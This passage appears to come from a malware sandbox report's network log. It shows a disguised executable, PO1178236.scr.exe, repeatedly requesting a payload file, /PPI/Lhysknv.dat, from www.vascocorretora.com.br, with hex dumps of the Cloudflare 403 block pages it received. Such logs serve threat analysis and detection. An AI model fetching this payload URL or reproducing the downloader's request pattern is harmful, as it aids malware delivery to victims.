        2025-01-09 07:35:57 UTC366INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:35:57 UTC1369INData Raw: 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65
        Data Ascii: e</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device
        2025-01-09 07:35:57 UTC1369INData Raw: 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63 68 61
        Data Ascii: highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha
        2025-01-09 07:35:57 UTC1369INData Raw: 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 30 65 35 30 61 30 64 37 32 38 35 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62
        Data Ascii: t border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c0e50a0d7285</strong></span> <span class="cf-footer-separator sm:hidden">&b
        2025-01-09 07:35:57 UTC996INData Raw: 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 30 65 35 30 61 30 64 37 32 38 35 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 31 4e 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64
        Data Ascii: ._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c0e50a0d7285',t:'MTczNjQwODE1Ni4wMDAwMDA='};var a=d
        2025-01-09 07:35:57 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        3192.168.2.949710188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:35:57 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:35:57 UTC1017INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:35:57 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:12 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rBe0YcJU9io0%2Ff6m5Vc%2BkPplqU2kcf17I3WHZ71AogN0Wrb%2BQzmfImx2%2BDRHS%2FRkbWbSgqOurgDmtAPx1K%2BRU65gXuf%2FGfFD8EWWe%2BsHyQcFcfg1skYd0CHUOBPSQAsliZpVGr2%2FaPyHulnQ"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c0e8aff90cc6-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1504&min_rtt=1500&rtt_var=572&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1898569&cwnd=180&unsent_bytes=0&cid=b9f4833fe7a79a22&ts=132&x=0"
        2025-01-09 07:35:57 UTC352INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:35:57 UTC1369INData Raw: 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74
        Data Ascii: d! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content
        2025-01-09 07:35:57 UTC1369INData Raw: 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e
        Data Ascii: cf-section cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>
        2025-01-09 07:35:57 UTC1369INData Raw: 65 72 20 73 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 30 65 38 61 66 66 39 30 63 63 36 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72
        Data Ascii: er sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c0e8aff90cc6</strong></span> <span class="cf-footer-separator
        2025-01-09 07:35:57 UTC1010INData Raw: 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 30 65 38 61 66 66 39 30 63 63 36 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 31 4e 79 34 77 4d 44 41 77
        Data Ascii: ript> window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c0e8aff90cc6',t:'MTczNjQwODE1Ny4wMDAw
        2025-01-09 07:35:57 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        4192.168.2.949711188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:35:58 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:35:58 UTC1001INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:35:58 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:13 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZwgnFmpoFOSfQUbuaoqvYpmhOMpbrF2G%2BCGdqbD1ZQM40WJUMFxapLeU0kl9s2hKDGJjuA4LBNAVOySha3pneq3bK0TBwwRtvi6QOfk5h8aBojlMPXUerGSpCEAOx9YMNsZBGYZrVuNBA66P"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c0ec9a277d1e-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1928&min_rtt=1922&rtt_var=733&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1479229&cwnd=192&unsent_bytes=0&cid=aa819c7bf06b4d94&ts=152&x=0"
        2025-01-09 07:35:58 UTC368INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:35:58 UTC1369INData Raw: 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77
        Data Ascii: /title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-w
        2025-01-09 07:35:58 UTC1369INData Raw: 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63 68 61 2d 63
        Data Ascii: ghlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-c
        2025-01-09 07:35:58 UTC1369INData Raw: 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 30 65 63 39 61 32 37 37 64 31 65 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c
        Data Ascii: border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c0ec9a277d1e</strong></span> <span class="cf-footer-separator sm:hidden">&bul
        2025-01-09 07:35:58 UTC994INData Raw: 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 30 65 63 39 61 32 37 37 64 31 65 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 31 4f 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64 6f 63
        Data Ascii: cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c0ec9a277d1e',t:'MTczNjQwODE1OC4wMDAwMDA='};var a=doc
        2025-01-09 07:35:58 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        5192.168.2.949712188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:35:58 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:35:58 UTC1001INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:35:58 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:13 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EQETytuiK5un4ORd6Fai09H8H2hyD7c6G38CseoMxMSVVEfV5h6W2oHautE93n7WWDPpiDeRibRJeinPdN2P3WeEqyuzLJcMrwrnenxvjQzhWOUgrRawTrHFuA1M1iReyFjCbndRjxO%2FFM9m"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c0f07d044370-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2371&min_rtt=2367&rtt_var=897&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1214137&cwnd=233&unsent_bytes=0&cid=dfe38ddfcddcbd8f&ts=148&x=0"
        2025-01-09 07:35:58 UTC368INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
